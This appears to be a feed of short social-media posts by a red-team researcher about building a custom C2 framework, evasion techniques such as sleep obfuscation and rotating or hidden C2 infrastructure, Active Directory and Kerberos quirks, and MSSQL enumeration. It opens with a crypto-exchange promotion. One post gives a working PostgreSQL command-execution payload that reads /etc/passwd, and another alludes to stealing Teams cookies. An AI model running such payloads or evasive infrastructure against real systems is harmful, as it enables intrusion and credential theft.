🔥The 9th Round of Easy Loan, Earn $40 Reward is in progress❗️ ⏰ Promotion Period: January 15th - Feburary 15th, 2025 👉 Register now and check more details at gate.io/campaigns/358

Hey ! I just saw that I didn't upload the slide deck... This is done now 😅

If you missed my talk at BlackAlps , you can find the slide deck in my usual repo ! The talk should be published in the end of the year ! github.com/OtterHacker/Co…

Just trying to use LLM to automate PPTX and DOCX translation. It seems it needs some additional fine-tuning...

Finally implemented a SOCKS in my custom C2. I faced several challenged regarding constant polling and timeout due to the beacon sleep but I'm quite happy with the performances !

Finally took the time to implement a Ekko (documented by 5pider) like sleep obfuscation on my beacon ! Thank's to all previous implementation it was quite easy. The technique might be well detected now but I found the main principle very pretty !

Might be the most appropriate Xmas gift I had !

PE dynamic loading implemented on my custom C2. The PE loader code can be found in my Defcon training !

Spent some time reworking my C2 builtin SOCKS to improve the performances. I can now rickroll people in 1080p through someone else network... The SOCKS protocol is easy to implement but it's easy to create a huge bottleneck when trying to implement it on a C2 agent...

I’m waiting for the moment where I will have to pentest applications developed with AI… I’m pretty sure it’s going to be a carnage…

If the first thing you do when you compromise a MSSQL server is to check for xp_cmdshell, you might want to read this... Using stored procedure you can enumerate the whole host, parse network shares and prepare your attack before xp_cmdshell... otterhacker.github.io/Pentest/Servic…

I was today old when I learnt that you can't use a ST on a DC that generated it. It seems to be a security feature to avoid replay attack. But if you activate Protected User on a domain with one DC you basically just locked you down but prevent attacks through SID History...

If you guys are still using CobaltStrike, here is a small terraform/ansible script to deploy a CS with an AWS redirector based on lambda and CloudFront ! It can be nice to bypass some companies proxies or just to hide your true C2 IP. github.com/OtterHacker/AW…

When doing RedTeam operation, you might need to refresh your public address frequently to avoid detection. Here is a small AWS infrastructure that will rotate your public address every 5 minutes without interrupting your scans or VPN. github.com/OtterHacker/AW…

I'm in my database period RCE with PostgreSQL DROP TABLE IF EXISTS files; CREATE TABLE files(filename text); COPY files FROM PROGRAM 'cat /etc/passwd'; SELECT * FROM files ORDER BY filename ASC;

If you ara still targeting active directory in 2025, you are not doing RedTeam, put glorified pentest… If the AD can be compromised as easily, the company just needs a internal pentest…

Do not use threat actor. If they have been detected, they are not good enough to be used as example…

Imagine if someone escape Teams electron, opens a Chrome devtools. It would be a shame if that someone steal the cookies like that...

Just sanity check, is it possible to use B\MSOL in SIDHistory of A\User to DCSync forest B from forest A ? Or does it only work in the same forest due to specific ACL check done by the DRS service that break the SIDHistory ?

Proxmox is free, supports container and easier to use. Why going to a greedy company for a homelab license ?

How Azure can be this painful, 10k modules differents, not compatible with each other, some work on Powershell, some only on Powershell 7.